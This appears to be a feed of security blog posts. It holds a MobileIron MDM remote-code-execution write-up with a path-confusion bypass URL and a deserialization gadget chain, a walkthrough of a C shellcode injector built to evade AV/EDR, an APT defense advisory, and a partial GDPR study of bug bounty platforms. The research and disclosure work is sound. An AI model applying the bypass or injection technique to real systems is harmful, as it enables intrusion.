So far, we have demonstrated a completely unauthenticated RCE on MobileIron. From how we get the firmware, find the vulnerability, and bypass the JNDI mitigation and network limitation. There are other stories, but due to the time, we have just listed topics here for those who are interested:

  • How to take over the employees’ devices from MDM
  • Disassemble the MI Protocol
  • And the CVE-2020-15506, an interesting authentication bypass

I hope this article could draw attention to MDM and the importance of enterprise security! Thanks for reading. :D

看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!

11 September 2020 at 16:00

English Version 中文版本

嗨! 好久不見,這是我在今年年初的研究,講述如何尋找一款知名行動裝置管理產品的漏洞,並繞過層層保護取得遠端程式碼執行的故事! 其中的漏洞經回報後在六月由官方釋出修補程式並緊急通知他們的客戶,而我們也在修補程式釋出 15 天後發現 Facebook 並未及時更新,因此透過漏洞取得伺服器權限並回報給 Facebook!

此份研究同時發表於 HITCON 2020,你可以從這裡取得這次演講的投影片!


身為一個專業的紅隊,我們一直在尋找著更快速可以從外部進入企業內網的最佳途徑! 如同我們去年在 Black Hat USA 發表的研究,SSL VPN 理所當然會放在外部網路,成為保護著網路安全、使員工進入內部網路的基礎設施,而當你所信任、並且用來保護你安全的設備不再安全了,你該怎麼辦?

由此為發想,我們開始尋找著有沒有新的企業網路脆弱點可當成我們紅隊攻擊滲透企業的初始進入點,在調查的過程中我們對 MDM/UEM 開始產生了興趣,而這篇文章就是從此發展出來的研究成果!

什麼是 MDM/UEM ?

Mobile Device Management,簡稱 MDM,約是在 2012 年間,個人手機、平板裝置開始興起時,為了使企業更好的管理員工的 BYOD 裝置,應運而生的資產盤點系統,企業可以透過 MDM 產品,管理員工的行動裝置,確保裝置只在信任的環境、政策下運行,也可以從中心的端點伺服器,針對所控制的手機,部署應用程式、安裝憑證甚至遠端操控以管理企業資產,更可以在裝置遺失時,透過 MDM 遠端上鎖,或是抹除整台裝置資料達到企業隱私不外漏的目的!

UEM (Unified Endpoint Management) 則為近幾年來更新的一個術語,其核心皆為行動裝置的管理,只是 UEM 一詞包含更廣的裝置定義! 我們以下皆用 MDM 一詞來代指同類產品。

我們的目標

MDM 作為一個中心化的端點控制系統,可以控制、並管理旗下所有員工個人裝置! 對日益壯大的企業來說,絕對是一個最佳的資產盤點產品,相對的,對駭客來說也是! 而為了管理來自世界各地的員工裝置連線,MDM 又勢必得曝露在外網。 一個可以「管理員工裝置」又「放置在外網」的設備,這對我們的紅隊演練來說無疑是最棒的滲透管道!

另外,從這幾年的安全趨勢也不難發現 MDM 逐漸成為駭客、APT 組織的首選目標! 誘使受害者同意惡意的 MDM 成為你裝置的 C&C 伺服器,或是乾脆入侵企業放置在外網的 MDM 設備,在批次地派送行動裝置木馬感染所有企業員工手機、電腦,以達到進一步的攻擊! 這些都已成真,詳細的報告可參閱 Cisco Talos 團隊所發表的 Malicious MDM: Let’s Hide This App 以及 CheckPoint CPR 團隊所發表的 First seen in the wild - Malware uses Corporate MDM as attack vector!

從前面的幾個案例我們得知 MDM 對於企業安全來說,是一個很好的切入點,因此我們開始研究相關的攻擊面! 而市面上 MDM 廠商有非常多,各個大廠如 Microsoft、IBM 甚至 Apple 都有推出自己的 MDM 產品,我們要挑選哪個開始成為我們的研究對象呢?

因此我們透過公開情報列舉了市面上常見的 MDM 產品,並配合各家特徵對全世界進行了一次掃描,發現最多企業使用的 MDM 為 VMware AirWatch 與 MobileIron 這兩套產品! 至於要挑哪一家研究呢? 我們選擇了後者,除了考量到大部分的客戶都是使用 MobileIron 外,另外一個吸引我的點則是 Facebook 也是他們的客戶! 從我們在 2016 年發表的 How I Hacked Facebook, and Found Someone’s Backdoor Script 研究中,就已發現 Facebook 使用 MobileIron 作為他們的 MDM 解決方案!

根據 MobileIron 官方網站描述,至少有 20000+ 的企業使用 MobileIron 當成他們的 MDM 解決方案,而根據我們實際對全世界的掃描,也至少有 15% 以上的財富世界 500 大企業使用 MobileIron 且曝露在外網(實際上一定更多),因此,尋找 MobileIron 的漏洞也就變成我們的首要目標!

如何開始研究

過往出現過的漏洞可以得知 MobileIron 並沒有受到太多安全人員研究,其中原因除了 MDM 這個攻擊向量尚未廣為人知外,另一個可能是因為關於 MobileIron 的相關韌體太難取得,研究一款設備最大的問題是如何從純粹的黑箱,到可以分析的灰箱、甚至白箱! 由於無法從官網下載韌體,我們花費了好幾天嘗試著各種關鍵字在網路上尋找可利用的公開資訊,最後才在 Goolge Search 索引到的其中一個公開網站根目錄上發現疑似是開發商測試用的 RPM 包。

下載回的韌體為 2018 年初的版本,離現在也有很長一段時間,也許核心程式碼也大改過,不過總比什麼都沒有好,因此我們就從這份檔案開始研究起。

備註: 經通知 MobileIron 官方後,此開發商網站已關閉。

如何尋找漏洞

整個 MobileIron 使用 Java 作為主要開發語言,對外開放的連接埠為 443, 8443, 9997,各個連接埠對應功能如下:

  • 443 為使用者裝置註冊介面
  • 8443 為設備管理介面
  • 9997 為一個 MobileIron 私有的裝置同步協定 (MI Protocol)

三個連接埠皆透過 TLS 保護連線的安全性及完整性,網頁部分則是透過 Apache 的 Reverse Proxy 架構將連線導至後方,由 Tomcat 部署的網頁應用處理,網頁應用則由 Spring MVC 開發。

由於使用的技術架構相對新,傳統類型的漏洞如 SQL Injection 也較難從單一的點來發現,因此理解程式邏輯並配合架構層面的攻擊就變成我們這次尋找漏洞的主要目標!

這次的漏洞也很簡單,主要是 Web Service 使用了 Hessian 格式處理資料進而產生了反序列化的弱點! 雖然漏洞一句話就可以解釋完了,但懂的人才知道反序列化並不代表你可以做任何事,接下來的利用才是精彩的地方!

現在已知 MobileIron 在處理 Web Service 的地方存在 Hessian 反序列化漏洞! 但漏洞存在,並不代表我們碰得到漏洞,可以觸發 Hessian 反序列化的路徑分別在:

  • 一般使用者介面 - https://mobileiron/mifs/services/
  • 管理介面 - https://mobileiron:8443/mifs/services/

管理介面基本上沒有任何阻擋,可以輕鬆的碰到 Web Service,而一般使用者介面的 Web Service 則無法存取,這對我們來說是一個致命性的打擊,由於大部分企業的網路架構並不會將管理介面的連接埠開放在外部網路,因此只能攻擊管理介面對於的利用程度並不大,因此我們必須尋找其他的方式去觸發這個漏洞!

仔細觀察 MobileIron 的阻擋方式,發現它是透過在 Apache 上使用 Rewrite Rules 去阻擋對一般使用者介面 Web Service 的存取:

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

嗯,很棒! 使用 Reverse Proxy 架構而且是在前面那層做阻擋,你是否想到什麼呢?



沒錯! 就是我們在 2015 年發現,並且在 Black Hat USA 2018 上所發表的針對 Reverse Proxy 架構的新攻擊面 Breaking Parser Logic! 這個優秀的技巧最近也被很好的利用在 CVE-2020-5902,F5 BIG-IP TMUI 的遠端程式碼執行上!

透過 Apache 與 Tomcat 對路徑理解的不一致,我們可以透過以下方式繞過 Rewrite Rule 再一次攻擊 Web Service!

https://mobileiron/mifs/.;/services/someService

碰! 因此現在不管是 8443 的管理介面還是 443 的一般使用者介面,我們都可以碰到有 Hessian 反序列化存在的 Web Service 了!

如何利用漏洞

現在讓我們回到 Hessian 反序列化的利用上! 針對 Hessian 反序列化,Moritz Bechler 已經在他的 Java Unmarshaller Security 中做了一個很詳細的研究報告! 從他所開源的 marshalsec 原始碼中,我們也學習到 Hessian 在反序列化過程中除了透過 HashMap 觸發 equals() 以及 hashcode() 等觸發點外,也可透過 XString 串出 toString(),而目前關於 Hessian 反序列化已存在的利用鏈有四條:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

而根據我們的目標環境,可以觸發的只有 Spring AOP 這條利用鏈!

  Name Effect
x Apache XBean JNDI 注入
x Caucho Resin JNDI 注入
Spring AOP JNDI 注入
x ROME EqualsBean RCE

無論如何,我們現在有了 JNDI 注入後,接下來只要透過 Alvaro MuñozOleksandr Mirosh 在 Black Hat USA 2016 上所發表的 A Journey From JNDI/LDAP to Remote Code Execution Dream Land 就可以取得遠端程式碼執行了… 甘安內?


自從 Alvaro MuñozOleksandr Mirosh 在 Black Hat 發表了這個新的攻擊向量後,不知道幫助了多少大大小小的駭客,甚至會有人認為「遇到反序列化就用 JNDI 送就對了!」,但自從 2018 年十月,Java 終於把關於 JNDI 注入的最後一塊拼圖給修復,這個修復被記載在 CVE-2018-3149 中,自此之後,所有 Java 高於 8u181, 7u191, 6u201 的版本皆無法透過 JNDI/LDAP 的方式執行程式碼,因此若要在最新版本的 MobileIron 上實現攻擊,我們勢必得面對這個問題!

關於 CVE-2018-3149,是透過將 com.sun.jndi.ldap.object.trustURLCodebase 的預設值改為 False 的方式以達到禁止攻擊者下載遠端 Bytecode 取得執行程式碼。

但幸運的是,我們依然可以透過 JNDI 的 Naming Reference 到本機既有的 Class Factory 上! 透過類似 Return-Oriented Programming 的概念,尋找本機 ClassPath 中可利用的類別去做更進一步的利用,詳細的手法可參考由 Michael Stepankin 在 2019 年年初所發表的 Exploiting JNDI Injections in Java,裡面詳細敘述了如何透過 Tomcat 的 BeanFactory 去載入 ELProcessor 達成任意程式碼執行!

這條路看似通暢,但實際上卻差那麼一點,由於 ELProcessor 在 Tomcat 8 後才被引入,因此上面的繞過方式只能在 Tomcat 版本大於 8 後的某個版本才能成功,而我們的目標則是 Tomcat 7.x,因此得為 BeanFactory 尋找一個新的利用鏈! 而經過搜尋,發現在 Welkin文章中所提到:

除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用


目標的 ClassPath 上剛好有 Groovy 存在! 於是我們又讓 Meta Programming 偉大了一次 :D

然而事實上,目標伺服器上 Groovy 版本為 1.5.6,是一個距今十年前老舊到不支援 Meta Programming 的版本,所以我們最後還是基於 Groovy 的程式碼,重新尋找了一個在 GroovyShell 上的利用鏈! 詳細的利用鏈可參考我送給 JNDI-Injection-Bypass 的這個 Pull Request!

攻擊 Facebook

現在我們已經有了一個基於 JNDI + BeanFactory + GroovyShell 的完美遠端程式碼執行漏洞,接下來就開始攻擊 Facebook 吧! 從前文提到,我們在 2016 年時就已知 Facebook 使用 MobileIron 當作他們的 MDM 解決方案,雖然現在再檢查一次發現首頁直接變成 403 Forbidden 了,不過幸運的是 Web Service 層並無阻擋! s

萬事俱備,只欠東風! 正當要攻擊 Facebook 的前幾天,我們突然想到,從上次進入 Facebook 伺服器的經驗,由於安全上的考量,Facebook 似乎會禁止所有對外部非法的連線,這點對我們 JNDI 注入攻擊有著至關重要的影響! 首先,JNDI 注入的核心就是透過受害者連線至攻擊者控制的惡意伺服器,並接收回傳的惡意 Naming Reference 後所導致的一系列利用,但現在連最開始的連線到攻擊者的惡意伺服器都無法,更別談後續的利用。


自此,我們關於 JNDI 注入的路已全被封殺,只能回到 Hessian 反序列化重新思考! 而現有的利用鏈皆無法達到遠端程式碼執行,所以我們勢必得拋棄 JNDI 注入,尋找一個新的利用鏈!



為了尋找新的利用鏈,必須先深入理解已存在利用鏈的原理及成因,在重讀 Java Unmarshaller Security 的論文後,我對其中一句話感到了好奇:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


哦,為什麼作者要特地補上這句話呢? 我開始有個猜想:

作者評估過把 Groovy 當成利用鏈的可行性,雖然被限制住了,但一定覺得有機會才會寫進論文中!


從這個猜想出發,雖然 Groovy 的利用鏈被 readResolve() 限制住了,但剛好我們目標版本的 Groovy 很舊,說不定尚未把這個限制加入程式庫!

我們比較了一下 Groovy-1.5.6 與最新版本位於 groovy/runtime/MethodClosure.java 中的 readSolve() 實現:

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

可以看到的確在舊版是沒有 ALLOW_RESOLVE 限制的,而後來經過考古後也發現,這個限制其實 Groovy 自己為了因應 2015 年所出現 Java 反序列化漏洞的減緩措施,因此也被分配了 CVE-2015-3253 這個漏洞編號! 由於 Groovy 只是一個只在內部使用、不會對外的小配角,因此在沒有特別需求下開發者也不會特地去更新它,因此成為了我們攻擊鏈的一環! 這也再一次驗證了「任何看似舉無輕重的小元件,都有可能成為你被攻擊的主因」!

最後,當然! 我們成功的取得在 Facebook 伺服器上的 Shell,以下是影片:

漏洞通報與修復

我們約在三月時完成整個漏洞研究,並在 4/3 日將研究成果寫成報告,透過 [email protected] 回報給 MobileIron! 官方收到後著手開始修復,在 6/15 釋出修補程式並記錄了三個 CVE 編號,詳細的修復方式請參閱 MobileIron 官方網站!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

當官方釋出修補程式後,我們也開始監控世界上所有有使用 MobileIron 企業的修復狀況,這裡只單純檢查靜態檔案的 Last-Modified Header,結果僅供參考不完全代表實際情況(Unknown 代表未開 443/8443 無法利用):


與此同時,我們也持續監控著 Facebook,並在 15 天確認都未修補後於 7/2 日成功進入 Facebook 伺服器後回報 Facebook Bug Bounty Program!

結語

到此,我們已經成功示範了如何尋找一個 MDM 伺服器的漏洞! 從繞過 Java 語言層級的保護、網路限制,到寫出攻擊程式並成功的利用在 Bug Bounty Program 上! 因為文長,還有許多來不及分享的故事,這裡僅條列一下供有興趣繼續研究的人參考!

  • 如何從 MDM 伺服器,控制回員工的手機裝置
  • 如何分析 MobileIron 的私有 MI Protocol
  • CVE-2020-15506 本質上其實是一個很有趣的認證繞過漏洞

希望這篇文章能夠喚起大眾對於 MDM 攻擊面的注意,以及企業安全的重要性! 感謝收看 :D

SeasideBishop: A C port of the UrbanBishop shellcode injector

3 September 2020 at 15:20

SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector

Introduction

This post covers a recent C port I wrote of b33f’s neat C# shellcode loader UrbanBishop. The prolific Rastamouse also did a veriation of UrbanBishop, using D/Invoke, called RuralBishop. This injection method has some quirks I hadn’t seen done before, so I thought it would be interesting to port it to C.

Credit of course goes to b33f, Rastamouse as well, and special thanks to AsaurusRex and Adamant for their help in getting it working.

The code for this post is available here.

The Code

First, a quick outline of the injection method, and then I will break it down API by API. SeasideBishop creates a section and maps a view of it locally, opens a handle to a remote process, maps a view of that same section into the process, and copies shellcode into the local view. As as view of the same section is also mapped in the remote process, the shellcode has now been allocated across processes. Next a remote thread is created and an APC is queued on it. The thread is alerted and the shellcode runs.

Opening The Remote Process

get-pid

Above we see the use of the native API NtOpenProcess to acquire a handle to the remote process. Native APIs calls are used throughout SeasideBishop as they tend to be a bit more stealthy than Win32 APIs, though they are still vulnerable to userland hooking.

Sections

A neat feature of this technique is the way that the shellcode is allocated in the remote process. Instead of using a more common and suspicious API like WriteProcessMemory, which is well known to AV/EDR products, SeasideBishop takes advantage of memory mapped files. This is a way of copying some or all of a file into memory and operating on it there, rather than manipulating it directly on disk. Another way of using it, which we will do here, is as an inter-process communication (IPC) mechanism. The memory mapped file does not actually need to be an ordinary file on disk. It can be simply a region of memory backed by the system page file. This way two processes can map the same region in their own address space, and any changes are immediately accessible to the other.

The way a region of memory is mapped is by calling the native API NtCreateSection. As the name indicates, a section, or section object, is the term for the memory mapped region.

create-section

Above is the call to NtCreateSection within the local process. We create a section with a size of 0x1000, or 4096 bytes. This is enough to hold our demo shellcode, but might need to be increased to accommodate a larger payload. Note that the allocation will be rounded up to the nearest page size, which is normally 4k.

The next step is to create a view of the section. The section object is not directly manipulated, as it represents the file-backed region of memory. We create a view of the section and make changes to that view. The remote process can also map a view using the same section handle, thereby accessing the same section. This is what allows IPC to happen.

local-map-section

Here we see the call to NtMapViewOfSection to create the view in the local process. Notice the use of RW and not RWX permissions, as we simply need to write the shellcode to the view.

memcpy

Next a simple memcpy writes our shellcode to the view.

remote-map-section

Finally we map a view of the same section in the remote process. Note that this time we use RX permissions so that the shellcode is executable. Now we have our shellcode present in the remote process’s memory, without using APIs like WriteProcessMemory. Now let’s work on executing it.

Starting From The End

In order to execute our shellcode in the remote process, we need a thread. In order to create one, we need to give the thread a function or address to begin executing from. Though we are not using Win32 APIs, the documentation for CreateRemoteThreadEx still applies. We need a “pointer to [an] application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and [serve as] the starting address of the thread in the remote process. The function must exist in the remote process.” The function we will use is RtlExitUserThread. This is not a very well documented function, but debugging indicates that this function is part of the thread termination process. So if we tell our thread to begin executing at this function, we are guaranteed that the thread will exit gracefully. That’s always a good thing when injecting into remote processes.

So now that we know the thread will exit, how do we get it to execute our code? We’ll get there soon, but first we need to get the address of RtlExitUserThread so that we can use it as the start address of our new remote thread.

function-address

There’s a lot going on here, but it’s really pretty simple. RtlExitUserThread is exported by ntdll.dll, so we need the DLL base address first before we can access its exports. We create the Unicode string needed by the LdrGetDllHandle native API call and then call it to get the address of ntdll.dll. With that done, we need to create the ANSI string required by LdrGetProcedureAddress to get the address of the RtlExitUserThread function. Again, notice no suspicious calls to LoadLibrary or GetProcAddress here.

Creating The Thread

Now that we have our thread start address, we can create it in the remote process.

create-remote-thread

Here we have the call to NtCreateThreadEx that creates the thread in the target process. Note the use of the pRemoteFunction variable, which contains the start address of RtlExitUserThread. Note also that the true argument above is a Boolean value for the CreateSuspended parameter, which means that the thread will be created in a suspended state and will not immediately begin executing. This will give us time to tell it about the shellcode we’d like it to run.

Execution

We’re in the home stretch now. The shellcode is in the remote process and we have a thread ready to execute it. We just need to connect the two together. To do that, we will queue an Asynchronous Procedure Call (APC) on the remote thread. APCs are a way of asynchronously letting a thread know that we have work for it to do. Each thread maintains an APC queue. When the thread is next scheduled, it will check that queue and run any APCs that are waiting for it, and then continue with its normal work. In our case, that work will be to run the RtlExitUserThread function and therefore exit gracefully.

queue-apc

Here we see how the thread and our shellcode meet. We use NtQueueApcThread to queue an APC onto the remote thread, using lpRemoteSection to point to the view containing the shellcode we mapped into the remote process earlier. Once the thread is alerted, it will check its APC queue and see our APC waiting for it.

alert-thread

A quick call to NtAlertResumeThread and the thread is alerted and runs our shellcode. Which of course pops the obligatory calc.

calc

Conclusion

I thought this was a neat injection method, with some quirks I hadn’t seen before, and I enjoyed porting it over to C and learning the concepts behind it in more detail. Hopefully others will find this useful as well.

Thanks again to b33f, Rasta, Adamant, and AsaurusRex for their help!

敵人不是勒贖軟體,而是組織型駭客

20 August 2020 at 16:00

前言

駭客攻擊事件一直存在於真實世界,只是鮮少被完整公開揭露。今年國內一些重大關鍵基礎設施 (Critical Information Infrastructure Protection,CIIP) 以及國內的跨國企業紛紛發生嚴重的資安事件,我們想簡單的跟大家談談這些事件背後企業真正需要思考及重視的核心問題。

企業面對的是組織型駭客而不只是勒贖軟體

不知道是因為勒贖軟體比較吸睛還是什麼緣故,媒體比較喜歡用勒贖軟體作為標題呈現近年企業面臨的重大威脅。實際上,勒贖軟體只是攻擊過程的工具、加密只是勒贖的手段之一,甚至包含竊取機敏資料。因為這些事件我們沒有參與調查或相關的活動,我們僅就已公開揭露的資料來一窺面對這樣的威脅,企業的具體做法有哪些?

根據法務部調查局在 iThome 2020 資安大會的分享

在這起攻擊事件中,駭客首先從 Web 伺服器、員工電腦等途徑,入侵公司系統長期潛伏及探測,而後竊取帳號權限,進入 AD 伺服器,利用凌晨時段竄改群組派送原則(GPO),同時預埋 lc.tmp 惡意程式到內部伺服器中,等到員工上班打開電腦後,電腦立即套用遭竄改的 GPO,依據指令就會自動將勒索軟體載到記憶體中來執行。

企業在被勒贖軟體加密後,往往第一時間容易直覺想到防毒軟體或端點防護設備為何沒有生效?現實是,如果企業面對的是針對式的攻擊(Advanced Persistent Threat,APT),攻擊者勢必會研究可以繞過企業的防護或監控的方式。所以企業要思考的應該是一個防禦戰線或更為全面的防護策略,而非仰賴單一的資安設備或服務。

從上述的敘述,我們可以發現幾個問題:

  1. Web 伺服器具有可利用的漏洞,而這個漏洞可能導致主機被取得權限進行後續的橫向移動。造成這個問題的原因可能包含:
    • 系統從未進行高強度的滲透測試及定期執行弱點掃描
    • 屬於老舊無法修補的系統(使用老舊的框架、程式語言)或是廠商已經不再維護
    • 一次性的活動網站或測試網站,活動或測試結束後未依照程序下線,成為企業防禦破口
    • 不在企業盤點的防護範圍內(如前端未設置 WAF)
  2. 從員工電腦或是 Web 伺服器可以逐步跳到 AD 伺服器,可能存在的問題則包含:
    • 網路間的區隔不嚴謹,例如未依照資料或系統的重要性進行區隔
    • 同網段伺服器間的通訊方式管控不當,沒有開啟或管制重要伺服器的通訊埠或限制來源 IP 位址
    • 系統存在可利用取得權限的弱點
  3. 利用凌晨時段竄改群組派送原則:最後是回應機制未即時(包含人員接獲告警後處理不當),企業對於具有集中管理權限的重要系統,例如 AD Server、資產管理軟體等這類型的主機,除了對特權帳號高強度的管理外(如 OTP),也應該針對「異常帳號登入」、「異常帳號新增到群組」、「正常帳號異常登入時間」、「新增排程或 GPO」等行為發出告警;而各種告警也應該依照資產的重要性訂定不同的 SLA 回應與處理。

你需要更全面、目標導向的方式思考企業資安現況

我們在近三年的紅隊演練,以企業對其營運最關鍵的資訊資產作為演練標的,並模擬組織型駭客的攻擊模式,透過外部情搜、取得外部系統權限、橫向移動、持續取得更多內部伺服器權限及提權、破解密碼,最終達到企業指定的關鍵資產執行演練情境。而企業透過高強度且精準的演練過程,除了明確掌握可被入侵的路徑外,更得以檢視上述問題的不足並持續改善。

我們認為,只要你的企業夠重要(對駭客而言重要,而不是自己覺得重要),組織型的攻擊就不會停歇!企業唯有不斷的找出自己不足之處,持續提升自己的防禦強度才是能真正降低風險的正確作法。

至於「第三方供應鏈安全」及「如何更完整的制定資安策略」,我們將找時間另外跟大家說明。

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation, where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR):
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare the responses that are quite different in style, completeness, accuracy, and thoroughness, I’ve decided to only count answers that are a part of the official answer. After the official response, discussions are not considered here, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
All good, everything provided, expectations met.
Improvable, at least one (obvious) piece of information is missing, only implicitly answered.
Left out, missing a substantial amount of data or a significant data point and/or unmet expectations.

This light system is then applied to the different GDPR questions and derived points either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the lights indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I’ve received quite a huge JSON file, which was quite easily parsable using your preferred scripting language. However, if a non-technical person would receive the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points such as logs collected through their (for some programs) required proxies or VPN endpoints, which is required by some programs, but no information was provided about that.

Bugcrowd did neither provide anything about all other given email addresses, nor did they deny to have anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished about the compactness of the answer and asked again to answer all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I’ve mentioned more than once that the provided data is inaccurate and incomplete and that they’ve left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 03th July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+” which requires every participant to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack did neither provide anything about all other given email addresses nor did they deny to have anything related to them.

